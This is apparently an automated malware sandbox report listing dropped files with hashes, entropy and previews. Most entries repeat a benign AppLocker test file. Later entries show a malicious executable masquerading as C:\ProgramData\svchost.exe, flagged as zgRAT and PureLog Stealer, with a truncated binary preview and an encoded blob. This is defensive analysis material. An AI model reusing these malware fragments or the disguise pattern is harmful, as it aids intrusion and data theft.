                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (304), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):304
                                                                                                                                                                              Entropy (8bit):5.794275153240054
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:dtBfYi/Llc5CfYplRJYEBvNjHakw03FTbAeAVVdctiNOkXLmltR:LurFpl7TBBHC0mnVbNbiltR
                                                                                                                                                                              MD5:17F4FAED744E62799742C49D3A9D9B51
                                                                                                                                                                              SHA1:6D39AA27AB6185E5D4FC7123891D287CEC8C9F1C
                                                                                                                                                                              SHA-256:6384C882D3C08C0A13F10BA2F479C6D80D8E7A286E2CB4DDE9EC40D0917F372B
                                                                                                                                                                              SHA-512:B47E21190D473E5B6D9D232F60E5990EA492E17A968D3FD7F0B6DBF443CEEBED77210A73C9B07509DDDD26A3EDE09503232A3FBD2637CE18E3A178AD4CC835AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:H4sIAAAAAAAEAIWPQUsDQQyF/8rSk4Is1IVSvJWVWlGkWnsyHsJM3E6ZSYZJ6Lb/3kE89GDx9OAled/Lx6S/A9gqFQXYC1MVp66EbC0daXLzx/yFbCXiAbKM1d9RjGe76yJDwdQsQyRtro7z2TXAGNjLqE3CEAHenvb28OpOQS7dVSQHVsMYm0f+kpLQgnDtlvx/rEFkiFQTskerOm27tpu13fS2ksnJgcoJwKOuRC8/ucj5Hg0BnsVh7fxOKQMkXQzEtsEDaRIOJgWg32HgXtKGSs3+tX+CP78BbVjw+l8BAAA=
                                                                                                                                                                              Process:C:\ProgramData\svchost.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\ProgramData\svchost.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                              Entropy (8bit):5.031377595969092
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
                                                                                                                                                                              MD5:77218AE27E9AD896918D9A081C61B1BE
                                                                                                                                                                              SHA1:3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
